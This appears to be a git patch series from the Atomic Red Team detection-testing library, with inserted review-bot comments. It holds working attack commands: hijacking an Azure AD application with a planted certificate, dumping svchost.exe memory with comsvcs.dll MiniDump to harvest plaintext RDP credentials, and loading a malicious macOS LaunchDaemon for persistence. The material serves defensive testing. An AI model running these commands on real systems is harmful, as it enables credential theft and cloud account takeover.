System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) +$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + +New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + +Start-Sleep -s 30 +$tenant=Get-AzureADTenantDetail +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb +Write-Host "Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" +Write-Host "End of Hijacking" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$app = Get-AzureADApplication -Searchstring "#{application_name}" +$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId +foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId + } +} +Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item +rm "#{path_to_cert}\#{application_name}.pfx" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AzureAD) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
+
+ +## Atomic Test #3 - AWS - Create Access Key and Secret Key Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised **Supported Platforms:** Iaas:aws From 79e706f2dfcb95a381de87cdec76415cfd9403cd Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Fri, 9 Jul 2021 09:34:32 -0600 Subject: [PATCH 07/19] fix cleanup cmd as per issue #1543 (#1548) --- atomics/T1136.002/T1136.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml index 4bdc79bb..c8a4875e 100644 --- a/atomics/T1136.002/T1136.002.yaml +++ b/atomics/T1136.002/T1136.002.yaml @@ -81,6 +81,6 @@ atomic_tests: $User.Save() $User cleanup_command: | - net user "#{username}" >nul 2>&1 /del /domain + cmd /c "net user #{username} /del >nul 2>&1" name: powershell elevation_required: false # Requires a user to be a Domain Admin! From d50e69b5c86284b10f60d4d19a4ab0219e0a0bc7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 9 Jul 2021 15:35:13 +0000 Subject: [PATCH 08/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1136.002/T1136.002.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2096530e..dbfd8b93 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -39975,7 +39975,7 @@ persistence: $User.DisplayName = $SamAccountName $User.Save() $User - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" ' name: powershell diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index 7ab024da..9af874c7 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md 
@@ -133,7 +133,7 @@ $User #### Cleanup Commands: ```powershell -net user "#{username}" >nul 2>&1 /del /domain +cmd /c "net user #{username} /del >nul 2>&1" ``` From 223584b41f29653e52bfc2464b3ed6817d329c16 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 13 Jul 2021 12:13:33 -0600 Subject: [PATCH 09/19] Bump addressable from 2.7.0 to 2.8.0 (#1549) Bumps [addressable](https://github.com/sporkmonger/addressable) from 2.7.0 to 2.8.0. - [Release notes](https://github.com/sporkmonger/addressable/releases) - [Changelog](https://github.com/sporkmonger/addressable/blob/main/CHANGELOG.md) - [Commits](https://github.com/sporkmonger/addressable/compare/addressable-2.7.0...addressable-2.8.0) --- updated-dependencies: - dependency-name: addressable dependency-type: indirect ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 68078e7a..d1f9a35d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -12,7 +12,7 @@ GEM minitest (~> 5.1) tzinfo (~> 1.1) zeitwerk (~> 2.2, >= 2.2.2) - addressable (2.7.0) + addressable (2.8.0) public_suffix (>= 2.0.2, < 5.0) coffee-script (2.4.1) coffee-script-source From d42bda32a1ac33a0f784b31596da74c43d24f043 Mon Sep 17 00:00:00 2001 From: Jay_darknight <55954468+jayaram24@users.noreply.github.com> Date: Wed, 14 Jul 2021 12:13:59 -0500 Subject: [PATCH 10/19] Dump svchost.exe to gather RDP plaintext credential (#1551) --- atomics/T1003/T1003.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index d622c125..a8d0ee53 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml 
@@ -85,3 +85,22 @@ atomic_tests: Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore name: powershell elevation_required: true + +- name: Dump svchost.exe to gather RDP credentials + description: | + The svchost.exe contains the RDP plain-text credentials. + Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ + + Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. + supported_platforms: + - windows + executor: + command: | + $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) + if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } + C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full + cleanup_command: | + Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore + name: powershell + elevation_required: true + From 1f82f6af1f73be17781261ceaa537462ec2e2449 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 14 Jul 2021 17:14:23 +0000 Subject: [PATCH 11/19] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003/T1003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index a8d0ee53..2d5056a3 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -87,6 +87,7 @@ atomic_tests: elevation_required: true - name: Dump svchost.exe to gather RDP credentials + auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9 description: | The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 1b4d0b87..bdecd84c 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
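Review bot: The fallback on the second command line, `(Get-Process svchost)[0].Id`, dumps whichever svchost instance happens to be listed first when no established RDP connection is found, so on a host without an active RDP session the test silently produces a dump of an unrelated process and the description's claim about RDP plain-text credentials does not hold for that run. A clearer behaviour is to stop and report, e.g. `if(-not $ps){ Write-Host "No established RDP session on port 3389; test not applicable"; exit 1 }`, or at least to state in the description that an active RDP session must exist before running. The dump at `$env:TEMP\svchost-exe.dmp` holds live credentials for as long as it exists, so the description should also tell operators to run the cleanup promptly rather than leaving the file for later. The hunk's last line leaves a trailing blank entry at the end of the atomic_tests list.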
@@ -731,3 +731,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 5a51ef57-299e-4d62-8e11-2d440df55e69 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a +d400090a-d8ca-4be0-982e-c70598a23de9 From 4af8bae9f467a82777e06a1bc53bc76cfef407b3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 14 Jul 2021 17:14:29 +0000 Subject: [PATCH 12/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 +++++++++ atomics/T1003/T1003.md | 39 +++++++++++++++++++ 6 files changed, 62 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ea2dfdec..f2257e0e 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -55,6 +55,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cb774351..b338da52 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -39,6 +39,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 8b4533db..21b70104 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -91,6 +91,7 @@ - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] + - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows] - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - Atomic Test #1: Password Cracking with Hashcat [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index ef36826f..d85cc21e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -69,6 +69,7 @@ - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] + - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows] - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - Atomic Test #1: Password Cracking with Hashcat [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index dbfd8b93..51fee12e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4062,6 +4062,25 @@ credential-access: C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore" name: powershell elevation_required: true + - name: Dump svchost.exe to gather RDP credentials + auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9 + description: | + The svchost.exe contains the RDP plain-text credentials. + Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ + + Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. + supported_platforms: + - windows + executor: + command: | + $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) + if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } + C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full + cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore + +' + name: powershell + elevation_required: true T1110.002: technique: external_references: diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index f7c73c92..64a86e77 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md 
@@ -11,6 +11,8 @@ Several of the tools mentioned in associated sub-techniques may be used by both - [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy) +- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials) +
@@ -133,4 +135,41 @@ Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f +
+
+ +## Atomic Test #3 - Dump svchost.exe to gather RDP credentials +The svchost.exe contains the RDP plain-text credentials. +Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ + +Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) +if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } +C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full +``` + +#### Cleanup Commands: +```powershell +Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore +``` + + + + +
From df34cadff9d8d55afee76ee164386c001bb72358 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Mon, 19 Jul 2021 15:51:21 -0500 Subject: [PATCH 13/19] T1135 - Fixed key name in executor test (#1552) * Fixed key name of `elevation_require` to `elevation_required` --- atomics/T1135/T1135.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index ff02d0ae..09be538c 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -45,7 +45,7 @@ atomic_tests: command: | smbstatus --shares name: bash - elevation_require: true + elevation_required: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | From 6f2bf060fb3ace95967442dcc5a7f6b4f3c22859 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 19 Jul 2021 20:51:52 +0000 Subject: [PATCH 14/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1135/T1135.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 51fee12e..11363213 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -51616,7 +51616,7 @@ discovery: ' name: bash - elevation_require: true + elevation_required: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 3a6992bb..87763ed2 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -75,7 +75,7 @@ Network Share Discovery using smbstatus | package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash 
From b402f11979ef78074f4180a221b6cb71dc6d7bc5 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 19 Jul 2021 14:15:04 -0700 Subject: [PATCH 15/19] Update the README as per Wiki Update (#1550) Co-authored-by: Carrie Roberts --- README.md | 70 ++++++++++++++++++++----------------------------------- 1 file changed, 25 insertions(+), 45 deletions(-) diff --git a/README.md b/README.md index 0a0bc26d..507cc52d 100644 --- a/README.md +++ b/README.md @@ -1,59 +1,39 @@

# Atomic Red Team + [![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team) -Atomic Red Team allows every security team to test their controls by executing simple -"atomic tests" that exercise the same techniques used by adversaries (all mapped to -[Mitre's ATT&CK](https://attack.mitre.org)). +Atomic Red Team is library of tests mapped to the +[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use +Atomic Red Team to quickly, portably, and reproducibly test their environments. -## Philosophy +## Get started -Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are -focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks. +You can execute atomic tests directly from the command line, no installation +required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started) +page of our wiki. -Three key beliefs made up the Atomic Red Team charter: -- **Teams need to be able to test everything from specific technical controls to outcomes.** - Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know - what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we - do believe in knowing our blind spots. +For a more robust testing experience, consider using an execution framework like +[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam). -- **We should be able to run a test in less than five minutes.** - Most security tests and automation tools take a tremendous amount of time to install, configure, and execute. - We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be - run in a few minutes. +## Learn more - The best test is the one you actually run. 
+The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/). -- **We need to keep learning how adversaries are operating.** - Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing - their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used, - which makes the community working together essential to making us all better. +For information about the philosophy and development of Atomic Red Team, visit +our website at . -See: https://atomicredteam.io +## Contribute to Atomic Red Team -## Having trouble? +Atomic Red Team is open source and community developed. If you're interested in +becoming a contributor, check out these resources: -Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)) - -## Getting Started - -* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team) -* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework) -* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) - - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv)) - - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv)) - - Linux 
[Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv)) -* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json)) -* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications -* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) - * Need a Slack invitation? Submit an invite request via this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link) - -## Code of Conduct - -In order to have a more open and welcoming community, Atomic Red Team adheres to a -[code of conduct](CODE_OF_CONDUCT.md). - -## License - -See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file. +- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved + with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md) + before you join. +- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose). +- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) + for more information about contributing directly to this repository. +- Check the [license](LICENSE.txt) for information regarding the distribution + and modification of Atomic Red Team. 
From 842a5df8795424f6f41698fed232f913e2432ad0 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Mon, 19 Jul 2021 16:19:59 -0500 Subject: [PATCH 16/19] T1056.001 - Updating dependencies (#1555) * T1056.001 - Updating dependencies Moved `prereq_command` and `get_prereq_command` under dependencies to conform to other tests * white space correction Co-authored-by: Carrie Roberts --- atomics/T1056.001/T1056.001.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 48d62471..a09fdc50 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -32,10 +32,13 @@ atomic_tests: Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. - prereq_command: | - test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so' - get_prereq_command: | - echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" + dependencies: + - description: | + Checking if pam_tty_audit.so is installed + prereq_command: | + test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so' + get_prereq_command: | + echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" supported_platforms: - linux executor: From 0f8eb34b74957c986d0d8e7212ba52f9a7771bc2 Mon Sep 17 00:00:00 2001 
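Review bot: The relocated `prereq_command` still passes a single quoted string to `test -f`, `'/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'`, so `test` looks for one file whose name literally contains ` -o ` and always returns 1; the dependency check never passes even when the module is installed. Since this change already moves the line under `dependencies:`, it is the right moment to correct it: `[ -f /usr/lib/pam/pam_tty_audit.so ] || [ -f /usr/lib64/security/pam_tty_audit.so ]`. The `get_prereq_command` only echoes a message, so a failing check cannot be resolved automatically; the dependency description could state that explicitly so a failed prerequisite is not mistaken for a tooling error.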
From: CircleCI Atomic Red Team doc generator Date: Mon, 19 Jul 2021 21:20:24 +0000 Subject: [PATCH 17/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 20 ++++++++++++++------ atomics/T1056.001/T1056.001.md | 12 ++++++++++++ 2 files changed, 26 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 11363213..3adf9eda 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2522,11 +2522,15 @@ credential-access: 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. \n" - prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + dependencies: + - description: 'Checking if pam_tty_audit.so is installed ' - get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and - recompile, for this test to work" + prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + +' + get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so + and recompile, for this test to work" ' supported_platforms: @@ -7976,11 +7980,15 @@ collection: 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. \n" - prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + dependencies: + - description: 'Checking if pam_tty_audit.so is installed ' - get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and - recompile, for this test to work" + prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' + +' + get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so + and recompile, for this test to work" ' supported_platforms: 
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index 76f5881a..88c11054 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -93,6 +93,18 @@ sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth +#### Dependencies: Run with `sh`! +##### Description: Checking if pam_tty_audit.so is installed +##### Check Prereq Commands: +```sh +test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so' +``` +##### Get Prereq Commands: +```sh +echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" +``` + +
From 9d2212bd206cd4a3617d36a6ae2ee204524a8272 Mon Sep 17 00:00:00 2001 From: Josh Rickard Date: Mon, 19 Jul 2021 16:21:15 -0500 Subject: [PATCH 18/19] T1543.004 - Updated cleanup key (#1553) Updated the key `cleanup` to `cleanup_command` to conform to other tests. Co-authored-by: Carrie Roberts --- atomics/T1543.004/T1543.004.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml index 7e4b5428..27adc319 100644 --- a/atomics/T1543.004/T1543.004.yaml +++ b/atomics/T1543.004/T1543.004.yaml @@ -32,7 +32,7 @@ atomic_tests: command: | sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | + cleanup_command: | sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} From 4ab80721acb45fdfb98b30bc6b2e623595cabcdc Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 19 Jul 2021 21:21:58 +0000 Subject: [PATCH 19/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1543.004/T1543.004.md | 5 +++++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3adf9eda..4f451fdb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -13588,7 +13588,7 @@ privilege-escalation: command: | sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | + cleanup_command: | sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} T1053.004: 
